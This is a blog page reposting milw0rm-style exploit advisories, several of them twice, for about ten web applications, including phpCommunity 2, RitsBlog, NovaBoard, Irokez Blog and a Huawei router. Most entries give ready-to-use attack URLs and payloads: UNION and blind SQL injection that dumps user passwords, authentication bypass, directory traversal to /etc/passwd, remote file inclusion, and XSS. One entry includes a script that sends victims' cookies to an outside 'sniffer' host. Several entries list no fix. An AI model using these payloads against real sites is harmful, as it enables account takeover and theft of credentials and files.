Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/
Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
Requisites: none
File affected: templates/1/login.php
Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg= script alert('XSS'); /script
Fix
No fix.
# milw0rm
Showing posts with label xss. Show all posts
Showing posts with label xss. Show all posts
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Discloscure
http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.
# milw0rm
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Discloscure
http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.
# milw0rm
Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability Software Site: blogsa.net Discovered by: Onur YILMAZ aka DJR Blog: http://www.onuryilmaz.info E-mail: contactonuryilmazinfo
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
UMI.CMS Cross-Site Scripting vulnerability
Affected Software
UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)
Product Link:
http://www.umi-cms.ru
Severity Rating
Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote
CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)
CVE: not assigned
Software Description
UMI.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.
User input passed to the "fields_filter" setting is not properly sanitized. This can be exploited to inject malicious code and allows to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.
Solution
Update to version 2.7.1 (build 10856).
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-12
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)
Product Link:
http://www.umi-cms.ru
Severity Rating
Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote
CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)
CVE: not assigned
Software Description
UMI.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.
User input passed to the "fields_filter" setting is not properly sanitized. This can be exploited to inject malicious code and allows to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.
Solution
Update to version 2.7.1 (build 10856).
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-12
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
Program: NovaBoard
Version: <= 1.0.1 File affected: index.php Download: http://www.novaboard.net/ Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
script alert(document.cookie) /script
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
Version: <= 1.0.1 File affected: index.php Download: http://www.novaboard.net/ Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
script alert(document.cookie) /script
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
ghostscripter Amazon Shop (XSS/DT/RFI) Multiple Vulnerabilities
ghostscripter Amazon Shop (XSS/directory traversal[Unix]/File Include)Vulns
Price: $549
Discovered By d3b4g
script: http://ghostscripter.com/amazon_shop.php
Greetz : str0ke & My friends
Follow me on twitter www.twitter.com/schaba
This script is suffer from Multiple Vulnerabilities
0x1 Directory traversal[Unix]
preety longone _))
P0c: http://demo.ghostscripter.com/amazon/add_review.php?id=B00004TXJV〈=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
0x2 Multiple File Include:
p0c:
http://demo.ghostscripter.com:80/amazon/cart.php?cmd=add&asin=[shell]
http://demo.ghostscripter.com:80/amazon/index.php?lang=[shell]
http://demo.ghostscripter.com:80/amazon/info.php?asin=[shell]
0x3 Cross Site Scripting (XSS)
http://demo.ghostscripter.com/amazon/search.php?query=1&mode=all
# milw0rm
Price: $549
Discovered By d3b4g
script: http://ghostscripter.com/amazon_shop.php
Greetz : str0ke & My friends
Follow me on twitter www.twitter.com/schaba
This script is suffer from Multiple Vulnerabilities
0x1 Directory traversal[Unix]
preety longone _))
P0c: http://demo.ghostscripter.com/amazon/add_review.php?id=B00004TXJV〈=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
0x2 Multiple File Include:
p0c:
http://demo.ghostscripter.com:80/amazon/cart.php?cmd=add&asin=[shell]
http://demo.ghostscripter.com:80/amazon/index.php?lang=[shell]
http://demo.ghostscripter.com:80/amazon/info.php?asin=[shell]
0x3 Cross Site Scripting (XSS)
http://demo.ghostscripter.com/amazon/search.php?query=1&mode=all
# milw0rm
RitsBlog 0.4.2 (AB/XSS) Multiple Remote Vulnerabilities
[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/
[+] Bugs: [A] SQL Injection
[B] XSS Persistent
[+] Exploitation: Remote
[+] Date: 02 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
[+] Menu
- [1] Bugs
- [2] Code
- [3] Fix
[+] Bugs
- [A] SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php
This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.
In jobs.php:
if ($_GET[j] == "login"){
if ($blog -> login($_GET[p])){
$_SESSION[loggedin] = "ok";
$_SESSION[userID] = $blog -> userID;
echo "Password found. Loging in...";
....
In ritsBlogAdmin.class.php:
function login($password){
global $db;
$sql = "select * from users where secretWord = '$password'";
...
}
- [B] XSS Persistent
[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php
In jobs.php:
if ($_POST[j] == "addComment"){
echo $blog -> addComment($_POST[id], $_POST[name],
$_POST[body]);
}
In ritsBlogAdmin.class.php
function addComment($id, $name, $body){
global $db;
$sql = "INSERT INTO comments (name, postID, date, text)
VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" .
addslashes($body) . "')";
...
}
[+] Code
- [A] SQL Injection
http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1
- [B] XSS Persistent
It is possible using forms in the index.php or
to send over POST method the following values:
?j=addComment&id=54&name=myname&body= script alert('XSS');/script
or
?j=addComment&id=54&name= script alert('XSS'); /script &body=body
[+] Fix
No fix.
-- Salvatore "drosophila" Fresta CWNP444351
# milw0rm
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/
[+] Bugs: [A] SQL Injection
[B] XSS Persistent
[+] Exploitation: Remote
[+] Date: 02 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
[+] Menu
- [1] Bugs
- [2] Code
- [3] Fix
[+] Bugs
- [A] SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php
This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.
In jobs.php:
if ($_GET[j] == "login"){
if ($blog -> login($_GET[p])){
$_SESSION[loggedin] = "ok";
$_SESSION[userID] = $blog -> userID;
echo "Password found. Loging in...";
....
In ritsBlogAdmin.class.php:
function login($password){
global $db;
$sql = "select * from users where secretWord = '$password'";
...
}
- [B] XSS Persistent
[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php
In jobs.php:
if ($_POST[j] == "addComment"){
echo $blog -> addComment($_POST[id], $_POST[name],
$_POST[body]);
}
In ritsBlogAdmin.class.php
function addComment($id, $name, $body){
global $db;
$sql = "INSERT INTO comments (name, postID, date, text)
VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" .
addslashes($body) . "')";
...
}
[+] Code
- [A] SQL Injection
http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1
- [B] XSS Persistent
It is possible using forms in the index.php or
to send over POST method the following values:
?j=addComment&id=54&name=myname&body= script alert('XSS');/script
or
?j=addComment&id=54&name= script alert('XSS'); /script &body=body
[+] Fix
No fix.
-- Salvatore "drosophila" Fresta CWNP444351
# milw0rm
APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Application: APC PowerChute Network Shutdown's Web Interface
Vendor URL: http://www.apc.com/
Bug: XSS/Response Splitting
Exploits: YES
Reported: 20.10.2008
Vendor Response: 20.10.2008
Vendor Reference: 081020-000796
Solution: Use Firewall
Date of Public Advisory: 26.02.2009
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Linked XSS and Response Splitting vulnerabilities found in APC PowerChute Network Shutdown's Web Interface.
Details
*******
1. Linked XSS Vulnerability found in script /security/applet vulnerable parameter - "referrer"
Example
*******
GET /security/applet?referrer=>"'>![]()
2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page"
Example
*******
GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0
response:
HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html
Solution
********
http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539
A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that user's continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall.
References
**********
http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
research [at] dsecrg [dot] com
Vendor URL: http://www.apc.com/
Bug: XSS/Response Splitting
Exploits: YES
Reported: 20.10.2008
Vendor Response: 20.10.2008
Vendor Reference: 081020-000796
Solution: Use Firewall
Date of Public Advisory: 26.02.2009
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Linked XSS and Response Splitting vulnerabilities found in APC PowerChute Network Shutdown's Web Interface.
Details
*******
1. Linked XSS Vulnerability found in script /security/applet vulnerable parameter - "referrer"
Example
*******
GET /security/applet?referrer=>"'>
2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page"
Example
*******
GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0
response:
HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html
Solution
********
http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539
A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that user's continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall.
References
**********
http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
research [at] dsecrg [dot] com
Irokez BLog 0.7.3.2 (XSS/RFI/BSQL) Multiple Remote Vulnerabilities
Application: Irokez Blog
------------
Website: http://irokez.org
--------
Version: All (0.7.3.2)
--------
Date: 11-02-2009
-----
[ BLIND SQL-INJECTION ]
[ SOME VULNERABLE CODE ]
/classes/table.class.php
...
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);
===>>> Exploit:
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
etc
[ ACTIVE XSS ]
in comments.
[ SOME VULNERABLE CODE ]
/scripts/blog/output-post.inc.php
input id="name" type="text" class="text" name="name" value="">"
label for="name">
input id="email" type="text" class="text" name="email" value="">"
label for="email">
input id="site" type="text" class="text" name="site" value="">"
label for="site">
...
textarea id="message" name="message" class="textarea">>> Exploit:
script img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie; script
[ INCLUDE ]
[ SOME VULNERABLE CODE ]
/thumbnail.php
...
ob_start();
switch ($module) {
case 'gallery':
include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';
$Obj = new TBL_Gallery;
$image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src');
break;
default:
$image_path = '';
}
===>>> Exploit:
http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]
Author: Eugene "Corwin" Ermakov
-------
Contact: corwin88[dog]mail[dot]ru
--------
# milw0rm
------------
Website: http://irokez.org
--------
Version: All (0.7.3.2)
--------
Date: 11-02-2009
-----
[ BLIND SQL-INJECTION ]
[ SOME VULNERABLE CODE ]
/classes/table.class.php
...
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);
===>>> Exploit:
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
etc
[ ACTIVE XSS ]
in comments.
[ SOME VULNERABLE CODE ]
/scripts/blog/output-post.inc.php
input id="name" type="text" class="text" name="name" value="">"
label for="name">
input id="email" type="text" class="text" name="email" value="">"
label for="email">
input id="site" type="text" class="text" name="site" value="">"
label for="site">
...
textarea id="message" name="message" class="textarea">>> Exploit:
script img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie; script
[ INCLUDE ]
[ SOME VULNERABLE CODE ]
/thumbnail.php
...
ob_start();
switch ($module) {
case 'gallery':
include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';
$Obj = new TBL_Gallery;
$image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src');
break;
default:
$image_path = '';
}
===>>> Exploit:
http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]
Author: Eugene "Corwin" Ermakov
-------
Contact: corwin88[dog]mail[dot]ru
--------
# milw0rm
Optus/Huawei E960 HSDPA Router SMS XSS Attack
XSS Attack using SMS to Optus/Huawei E960 HSDPA Router
Synopsis
--------
Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is vulnerable to XSS attack using SMS. One of the feature of this router is the ability to send and receive SMS through its web interface. The SMS text is presented unescaped/unfiltered on the inbox view, and an attacker can craft malicious short messages to gain control over victims router.
Details
--------
The first 32 characters of every incoming SMS is presented in unescaped form in the inbox view. The 32 characters limit can be overcome by using several messages, and inserting javascript comment to merge the current message with the next one.
Example:
First message ends with /* which will comment the all the HTML code up to the second message
Note that newest message is presented first, so the order of the SMS sending must be reversed.
Impact
------
An attacker can
- get victim's PPP password by accessing /js/connection.js
- disconnect victim's internet connection
- send SMS with victim's router
- gain access to victim's WIFI password
Recovery
--------
After an attack is performed, the inbox page can not be used to delete the received messages (because the delete button is not available/visible). To remove offending messages from the inbox, telnet to the router with username 'admin' and password 'admin'. Huawei E960 uses busybox shell, so standard rm command can be used to remove the messages (it is located at /tmp/sms/inbox_sms). After removing the message content, the deleted messages will still be in the inbox index, but it can now be removed from the inbox page.
Credits
-------
Rizki Wicaksono (http://www.ilmuhacking.com) found this vulnerability. The Indonesian article at http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/ gives more detail about this vulnerability. This English translation/summary was done by Yohanes Nugroho.
# milw0rm
Synopsis
--------
Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is vulnerable to XSS attack using SMS. One of the feature of this router is the ability to send and receive SMS through its web interface. The SMS text is presented unescaped/unfiltered on the inbox view, and an attacker can craft malicious short messages to gain control over victims router.
Details
--------
The first 32 characters of every incoming SMS is presented in unescaped form in the inbox view. The 32 characters limit can be overcome by using several messages, and inserting javascript comment to merge the current message with the next one.
Example:
First message ends with /* which will comment the all the HTML code up to the second message
Note that newest message is presented first, so the order of the SMS sending must be reversed.
Impact
------
An attacker can
- get victim's PPP password by accessing /js/connection.js
- disconnect victim's internet connection
- send SMS with victim's router
- gain access to victim's WIFI password
Recovery
--------
After an attack is performed, the inbox page can not be used to delete the received messages (because the delete button is not available/visible). To remove offending messages from the inbox, telnet to the router with username 'admin' and password 'admin'. Huawei E960 uses busybox shell, so standard rm command can be used to remove the messages (it is located at /tmp/sms/inbox_sms). After removing the message content, the deleted messages will still be in the inbox index, but it can now be removed from the inbox page.
Credits
-------
Rizki Wicaksono (http://www.ilmuhacking.com) found this vulnerability. The Indonesian article at http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/ gives more detail about this vulnerability. This English translation/summary was done by Yohanes Nugroho.
# milw0rm
Subscribe to:
Comments (Atom)
Posts
